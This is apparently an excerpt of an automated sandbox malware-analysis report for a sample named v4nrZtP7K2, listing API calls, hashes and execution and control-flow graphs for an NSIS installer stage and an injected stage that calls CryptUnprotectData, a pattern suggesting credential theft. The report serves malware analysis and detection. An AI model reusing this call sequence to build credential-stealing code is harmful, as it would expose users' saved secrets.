                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-297319885
                                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                      • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                      • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                      APIs
                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405D76
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405E1E
                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00405E2E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: 0_B
                                                                                      • API String ID: 3248276644-2128305573
                                                                                      • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                      • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                      • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                      • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                      APIs
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 004059E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                      • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                      • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,00403A1A,76F93420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-297319885
                                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                      • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                      • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6FFB116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB11C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB11D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 6FFB1203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 8679775c95783af3bfebe83eebe9ca7a06818d0950cfdb224693965b654c4608
                                                                                      • Instruction ID: 96ef4ae28d8c95edd8a35fd3715030d4c3ea0f0b9c661f49bedf1663d6e0efcd
                                                                                      • Opcode Fuzzy Hash: 8679775c95783af3bfebe83eebe9ca7a06818d0950cfdb224693965b654c4608
                                                                                      • Instruction Fuzzy Hash: 8A3192B2514206DFDB009F7AC985B6677ECEF46360B14061EE844DB368E778E9118760
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                      • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                      • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                      • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:4.7%
                                                                                      Total number of Nodes:276
                                                                                      Total number of Limit Nodes:22
                                                                                      execution_graph 42624 3760ce60 42625 3760ce7c 42624->42625 42628 376094b4 42625->42628 42627 3760ce9b 42629 376094bf 42628->42629 42630 3760cf4f 42629->42630 42633 3760cf68 42629->42633 42637 3760cf59 42629->42637 42630->42627 42636 3760cf7f 42633->42636 42634 3760d021 42634->42634 42636->42634 42641 376095e8 42636->42641 42640 3760cf67 42637->42640 42638 3760d021 42638->42638 42639 376095e8 2 API calls 42639->42638 42640->42638 42640->42639 42642 376095f3 42641->42642 42644 3760ec47 42642->42644 42645 3760e7f4 42642->42645 42644->42634 42646 3760e7ff 42645->42646 42647 3760f111 42646->42647 42650 3760fab0 42646->42650 42654 3760faa1 42646->42654 42647->42644 42651 3760fadb 42650->42651 42652 3760fb8a 42651->42652 42658 37a300c0 42651->42658 42656 3760fab0 42654->42656 42655 3760fb8a 42655->42655 42656->42655 42657 37a300c0 2 API calls 42656->42657 42657->42655 42662 37a30110 42658->42662 42666 37a30104 42658->42666 42663 37a30178 CreateWindowExW 42662->42663 42665 37a30234 42663->42665 42665->42665 42667 37a30110 CreateWindowExW 42666->42667 42669 37a30234 42667->42669 42669->42669 42670 36947ef7 42671 36947f0a 42670->42671 42673 36947f25 42671->42673 42675 369482a6 42671->42675 42676 36947628 42671->42676 42674 36947628 LdrInitializeThunk 42674->42675 42675->42673 42675->42674 42677 3694763a 42676->42677 42679 3694763f 42676->42679 42677->42675 42678 36947d69 LdrInitializeThunk 42678->42677 42679->42677 42679->42678 42680 37a320c0 42683 37a320ed 42680->42683 42681 37a3213c 42681->42681 42683->42681 42684 37a317fc 42683->42684 42685 37a31807 42684->42685 42690 37a317d0 42685->42690 42687 37a3229c 42689 376095e8 2 API calls 42687->42689 42688 37a322a5 42688->42681 42689->42688 42691 37a317db 42690->42691 42694 37a3181c 42691->42694 42693 37a322f5 42693->42687 42695 37a31827 42694->42695 42696 37a32461 GetCurrentThreadId 42695->42696 42697 37a3248b 42695->42697 42696->42697 42697->42693 42698 37a32020 SetTimer 42699 37a3208c 42698->42699 42700 db107 42701 db134 42700->42701 42702 db11a 42700->42702 42702->42701 42708 36940198 42702->42708 42714 36940188 42702->42714 42703 db1a3 42720 37a32730 42703->42720 42709 369401a4 42708->42709 42726 369403af 42709->42726 42710 369401b0 42734 3694c638 42710->42734 42711 369401da 42711->42703 42715 369401a4 42714->42715 42718 369403af 4 API calls 42715->42718 42716 369401b0 42719 3694c638 3 API calls 42716->42719 42717 369401da 42717->42703 42718->42716 42719->42717 42721 37a3273f 42720->42721 42786 37a30938 42721->42786 42727 36940393 42726->42727 42728 369403ba 42726->42728 42727->42710 42729 369404ae 42728->42729 42731 36947628 LdrInitializeThunk 42728->42731 42740 36947c2c 42728->42740 42746 3694761a 42728->42746 42752 36947848 42728->42752 42729->42710 42731->42729 42735 3694c631 42734->42735 42735->42734 42736 3694caf9 42735->42736 42737 36947848 2 API calls 42735->42737 42736->42711 42738 3694c77c 42737->42738 42738->42736 42758 3694cf01 42738->42758 42742 36947ae3 42740->42742 42741 36947c24 LdrInitializeThunk 42744 36947d81 42741->42744 42742->42741 42745 36947628 LdrInitializeThunk 42742->42745 42744->42729 42745->42742 42748 36947628 42746->42748 42747 3694763a 42747->42729 42748->42747 42749 36947c24 LdrInitializeThunk 42748->42749 42751 36947628 LdrInitializeThunk 42748->42751 42749->42747 42751->42748 42753 36947879 42752->42753 42754 369479d9 42753->42754 42755 36947c24 LdrInitializeThunk 42753->42755 42757 36947628 LdrInitializeThunk 42753->42757 42754->42729 42755->42754 42757->42753 42759 3694cf10 42758->42759 42763 3694d550 42759->42763 42771 3694d540 42759->42771 42760 3694cf80 42760->42738 42764 3694d575 42763->42764 42765 3694d629 42763->42765 42764->42765 42768 3694d550 CryptUnprotectData 42764->42768 42769 3694d540 CryptUnprotectData 42764->42769 42779 3694d733 42764->42779 42783 3694d1ec 42765->42783 42768->42765 42769->42765 42772 3694d550 42771->42772 42773 3694d629 42772->42773 42776 3694d550 CryptUnprotectData 42772->42776 42777 3694d540 CryptUnprotectData 42772->42777 42778 3694d733 CryptUnprotectData 42772->42778 42774 3694d1ec CryptUnprotectData 42773->42774 42775 3694d7f5 42774->42775 42775->42760 42776->42773 42777->42773 42778->42773 42780 3694d745 42779->42780 42781 3694d1ec CryptUnprotectData 42780->42781 42782 3694d7f5 42781->42782 42782->42765 42784 3694d9e0 CryptUnprotectData 42783->42784 42785 3694d7f5 42784->42785 42785->42760 42787 37a30948 42786->42787 42788 37a30965 42787->42788 42794 37a30980 42787->42794 42790 37a3188c 42788->42790 42791 37a31897 42790->42791 42793 37a32866 42791->42793 42817 37a31934 42791->42817 42795 37a309c6 GetCurrentProcess 42794->42795 42797 37a30a11 42795->42797 42798 37a30a18 GetCurrentThread 42795->42798 42797->42798 42799 37a30a55 GetCurrentProcess 42798->42799 42800 37a30a4e 42798->42800 42801 37a30a8b 42799->42801 42800->42799 42806 37a30f31 42801->42806 42808 37a30b4f 42801->42808 42802 37a30ab3 GetCurrentThreadId 42803 37a30ae4 42802->42803 42803->42788 42807 37a30f3a 42806->42807 42807->42802 42812 37a30bc0 42808->42812 42815 37a30bc8 DuplicateHandle 42808->42815 42809 37a30b8e 42809->42802 42813 37a30bc8 DuplicateHandle 42812->42813 42814 37a30c5e 42813->42814 42814->42809 42816 37a30c5e 42815->42816 42816->42809 42823 37a3193f 42817->42823 42818 37a32e79 42819 37a32ea9 42818->42819 42820 37a32ac4 7 API calls 42818->42820 42824 37a32ed4 42819->42824 42832 37a32ac4 42819->42832 42820->42819 42822 37a32ec1 42822->42824 42838 37a3d5f8 42822->42838 42844 37a3d608 42822->42844 42823->42818 42823->42824 42828 37a33e40 42823->42828 42824->42791 42829 37a33e61 42828->42829 42830 37a33e85 42829->42830 42850 37a33ff0 42829->42850 42830->42818 42833 37a32acf 42832->42833 42834 37a30938 6 API calls 42833->42834 42837 37a3d0a1 42833->42837 42835 37a3d0bb 42834->42835 42897 37a3c544 42835->42897 42837->42822 42842 37a3d608 42838->42842 42839 37a3d899 42840 37a30938 6 API calls 42839->42840 42841 37a3d6ba 42840->42841 42841->42824 42842->42839 42842->42841 42904 37a3c60c 42842->42904 42848 37a3d66d 42844->42848 42845 37a3d899 42846 37a30938 6 API calls 42845->42846 42847 37a3d6ba 42846->42847 42847->42824 42848->42845 42848->42847 42849 37a3c60c DispatchMessageW 42848->42849 42849->42848 42851 37a33ffd 42850->42851 42852 37a30938 6 API calls 42851->42852 42853 37a3402b 42852->42853 42855 37a34036 42853->42855 42856 37a32bec 42853->42856 42855->42830 42857 37a32bf7 42856->42857 42858 37a340a8 42857->42858 42860 37a32c20 42857->42860 42861 37a32c2b 42860->42861 42875 37a32c30 42861->42875 42864 37a34526 42865 37a340f8 CreateWindowExW CreateWindowExW 42864->42865 42866 37a34540 42865->42866 42867 37a34108 CreateWindowExW CreateWindowExW 42866->42867 42868 37a34547 42867->42868 42870 37a391f0 CreateWindowExW CreateWindowExW 42868->42870 42871 37a38400 CreateWindowExW CreateWindowExW 42868->42871 42872 37a39067 CreateWindowExW CreateWindowExW 42868->42872 42873 37a391d8 CreateWindowExW CreateWindowExW 42868->42873 42869 37a34551 42869->42858 42870->42869 42871->42869 42872->42869 42873->42869 42878 37a32c3b 42875->42878 42876 37a34517 42879 37a375cd 42876->42879 42877 37a33e40 8 API calls 42877->42876 42878->42876 42878->42877 42882 37a375ea 42879->42882 42880 37a37700 42881 37a376d3 42882->42880 42885 37a38060 42882->42885 42889 37a3804f 42882->42889 42887 37a3807d 42885->42887 42886 37a380c1 42886->42881 42887->42886 42893 37a34108 42887->42893 42891 37a3807d 42889->42891 42890 37a380c1 42890->42881 42891->42890 42892 37a34108 2 API calls 42891->42892 42892->42890 42894 37a34113 42893->42894 42895 37a38400 CreateWindowExW CreateWindowExW 42894->42895 42896 37a3901f 42895->42896 42896->42886 42898 37a3c54f 42897->42898 42899 37a3d3bb 42898->42899 42901 37a3c560 42898->42901 42899->42837 42902 37a3d3f0 OleInitialize 42901->42902 42903 37a3d454 42902->42903 42903->42899 42905 37a3e6d0 DispatchMessageW 42904->42905 42906 37a3e73c 42905->42906 42906->42842 42907 ad030 42908 ad048 42907->42908 42909 ad0a2 42908->42909 42915 37a31bd0 42908->42915 42921 37a31bc0 42908->42921 42927 37a303f0 42908->42927 42930 37a302c8 42908->42930 42935 37a302b7 42908->42935 42916 37a31bfd 42915->42916 42917 37a31c2f 42916->42917 42940 37a39b38 42916->42940 42945 37a31d58 42916->42945 42954 37a39b48 42916->42954 42922 37a31bd0 42921->42922 42923 37a31c2f 42922->42923 42924 37a39b38 CallWindowProcW 42922->42924 42925 37a39b48 CallWindowProcW 42922->42925 42926 37a31d58 2 API calls 42922->42926 42924->42923 42925->42923 42926->42923 42929 37a30407 42927->42929 42973 37a30841 42927->42973 42929->42909 42931 37a302ee 42930->42931 42933 37a31bc0 2 API calls 42931->42933 42934 37a31bd0 2 API calls 42931->42934 42932 37a3030f 42932->42909 42933->42932 42934->42932 42936 37a302c8 42935->42936 42938 37a31bc0 2 API calls 42936->42938 42939 37a31bd0 2 API calls 42936->42939 42937 37a3030f 42937->42909 42938->42937 42939->42937 42942 37a39b48 42940->42942 42941 37a39be8 42941->42917 42959 37a39bef 42942->42959 42963 37a39c00 42942->42963 42946 37a31d93 42945->42946 42947 37a31d66 42945->42947 42946->42947 42949 37a31d98 42946->42949 42948 37a31d6e 42947->42948 42953 37a31dc0 CallWindowProcW 42947->42953 42948->42917 42950 37a317d0 GetCurrentThreadId 42949->42950 42951 37a31da4 42950->42951 42951->42917 42952 37a31dac 42952->42917 42953->42952 42956 37a39b5c 42954->42956 42955 37a39be8 42955->42917 42957 37a39c00 CallWindowProcW 42956->42957 42958 37a39bef CallWindowProcW 42956->42958 42957->42955 42958->42955 42960 37a39c00 42959->42960 42961 37a39c11 42960->42961 42966 37a3b040 42960->42966 42961->42941 42964 37a39c11 42963->42964 42965 37a3b040 CallWindowProcW 42963->42965 42964->42941 42965->42964 42969 37a31dc0 42966->42969 42970 37a31e02 42969->42970 42972 37a31e09 42969->42972 42971 37a31e5a CallWindowProcW 42970->42971 42970->42972 42971->42972 42972->42961 42974 37a30856 42973->42974 42975 37a30938 6 API calls 42973->42975 42974->42929 42975->42974

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1123 36947628-36947638 1124 3694763f-3694764b 1123->1124 1125 3694763a 1123->1125 1128 36947652-36947667 1124->1128 1129 3694764d 1124->1129 1126 3694776b-36947775 1125->1126 1132 3694766d-36947678 1128->1132 1133 3694777b-369477bb call 369415c8 1128->1133 1129->1126 1136 36947776 1132->1136 1137 3694767e-36947685 1132->1137 1149 369477c2-36947877 call 369415c8 call 369414c0 1133->1149 1136->1133 1138 36947687-3694769e 1137->1138 1139 369476b2-369476bd 1137->1139 1148 369476a4-369476a7 1138->1148 1138->1149 1144 369476bf-369476c7 1139->1144 1145 369476ca-369476d4 1139->1145 1144->1145 1153 3694775e-36947763 1145->1153 1154 369476da-369476e4 1145->1154 1148->1136 1155 369476ad-369476b0 1148->1155 1184 3694787e-36947914 call 36941568 1149->1184 1185 36947879 1149->1185 1153->1126 1154->1136 1160 369476ea-36947706 1154->1160 1155->1138 1155->1139 1166 36947708 1160->1166 1167 3694770a-3694770d 1160->1167 1166->1126 1169 36947714-36947717 1167->1169 1170 3694770f-36947712 1167->1170 1172 3694771a-36947728 1169->1172 1170->1172 1172->1136 1177 3694772a-36947731 1172->1177 1177->1126 1178 36947733-36947739 1177->1178 1178->1136 1179 3694773b-36947740 1178->1179 1179->1136 1181 36947742-36947755 1179->1181 1181->1136 1187 36947757-3694775a 1181->1187 1190 369479b3-369479b9 1184->1190 1185->1184 1187->1178 1189 3694775c 1187->1189 1189->1126 1191 369479bf-369479d7 1190->1191 1192 36947919-3694792c 1190->1192 1193 369479d9-369479e6 1191->1193 1194 369479eb-369479fe 1191->1194 1195 36947933-36947984 1192->1195 1196 3694792e 1192->1196 1197 36947d81-36947e7f 1193->1197 1198 36947a05-36947a21 1194->1198 1199 36947a00 1194->1199 1214 36947986-36947994 1195->1214 1215 36947997-369479a9 1195->1215 1196->1195 1204 36947e87-36947e91 1197->1204 1205 36947e81-36947e86 call 36941568 1197->1205 1201 36947a23 1198->1201 1202 36947a28-36947a4c 1198->1202 1199->1198 1201->1202 1209 36947a53-36947a85 1202->1209 1210 36947a4e 1202->1210 1205->1204 1219 36947a87 1209->1219 1220 36947a8c-36947ace 1209->1220 1210->1209 1214->1191 1216 369479b0 1215->1216 1217 369479ab 1215->1217 1216->1190 1217->1216 1219->1220 1222 36947ad5-36947ade 1220->1222 1223 36947ad0 1220->1223 1224 36947d06-36947d0c 1222->1224 1223->1222 1225 36947d12-36947d25 1224->1225 1226 36947ae3-36947b08 1224->1226 1229 36947d27 1225->1229 1230 36947d2c-36947d47 1225->1230 1227 36947b0f-36947b46 1226->1227 1228 36947b0a 1226->1228 1238 36947b4d-36947b7f 1227->1238 1239 36947b48 1227->1239 1228->1227 1229->1230 1231 36947d4e-36947d62 1230->1231 1232 36947d49 1230->1232 1236 36947d64 1231->1236 1237 36947d69-36947d7f LdrInitializeThunk 1231->1237 1232->1231 1236->1237 1237->1197 1241 36947b81-36947ba6 1238->1241 1242 36947be3-36947bf6 1238->1242 1239->1238 1245 36947bad-36947bdb 1241->1245 1246 36947ba8 1241->1246 1243 36947bfd-36947c22 1242->1243 1244 36947bf8 1242->1244 1249 36947c24-36947c25 1243->1249 1250 36947c31-36947c69 1243->1250 1244->1243 1245->1242 1246->1245 1249->1225 1251 36947c70-36947cd1 call 36947628 1250->1251 1252 36947c6b 1250->1252 1258 36947cd3 1251->1258 1259 36947cd8-36947cfc 1251->1259 1252->1251 1258->1259 1262 36947d03 1259->1262 1263 36947cfe 1259->1263 1262->1224 1263->1262
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc907312b305e5f0f70cbe26e6eb50f1b1d651db31c5d204aee32e148d6c6b72
                                                                                      • Instruction ID: 1d7c45afe6388a9f05efff016ff508e0693a4926f30c79a327fb15a3e63f1105
                                                                                      • Opcode Fuzzy Hash: bc907312b305e5f0f70cbe26e6eb50f1b1d651db31c5d204aee32e148d6c6b72
                                                                                      • Instruction Fuzzy Hash: 8A223A74E003188FEB15EFA9D884B9DBBB2BF85314F6081A9D408AB355DB359D85CF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1932 3694d9d9-3694d9df 1933 3694d9e0-3694da52 CryptUnprotectData 1932->1933 1934 3694da54-3694da5a 1933->1934 1935 3694da5b-3694da83 1933->1935 1934->1935
                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(0000005F,?,00000000,?,?,?,?), ref: 3694DA45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: 387e87ab7420bf353de3e68ee721973c650c14a4ef427c621168b91f7e40333b
                                                                                      • Instruction ID: 29d271a94d46cdf59b28cac92bc4131864513574e680532baddd554a6b49a8d4
                                                                                      • Opcode Fuzzy Hash: 387e87ab7420bf353de3e68ee721973c650c14a4ef427c621168b91f7e40333b
                                                                                      • Instruction Fuzzy Hash: 841167B6800249DFDB10CF9AC841BEEBBF5EF48320F148419E654A7211C379AA54CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1938 3694d1ec-3694da52 CryptUnprotectData 1940 3694da54-3694da5a 1938->1940 1941 3694da5b-3694da83 1938->1941 1940->1941
                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(0000005F,?,00000000,?,?,?,?), ref: 3694DA45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2946301304.0000000036940000.00000040.00000800.00020000.00000000.sdmp, Offset: 36940000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_36940000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: cd3ba3c6cc218c8d781e2deb2ac1db2978f7c3c25b40271f21e00ac314df2cae
                                                                                      • Instruction ID: 9e27cc9989692d3e55fc8a4825f2a10b95884612dd893ad17158ee8fe0e832d3
                                                                                      • Opcode Fuzzy Hash: cd3ba3c6cc218c8d781e2deb2ac1db2978f7c3c25b40271f21e00ac314df2cae
                                                                                      • Instruction Fuzzy Hash: DE1167B6800349EFDB11CF9AC845BEEBBF4EF48320F158419E618A7250C379A954CFA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2947879873.0000000037600000.00000040.00000800.00020000.00000000.sdmp, Offset: 37600000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_37600000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0^V7
                                                                                      • API String ID: 0-3809573850
                                                                                      • Opcode ID: b3c9b442e3790dc7c7591193c4bf1f82b4588ea0690c979076cb9707502fb8ac
                                                                                      • Instruction ID: da23a8ce012daf260bf5e15942b19930773dccf2279c14d0c60a8f4ddd8a3a3c
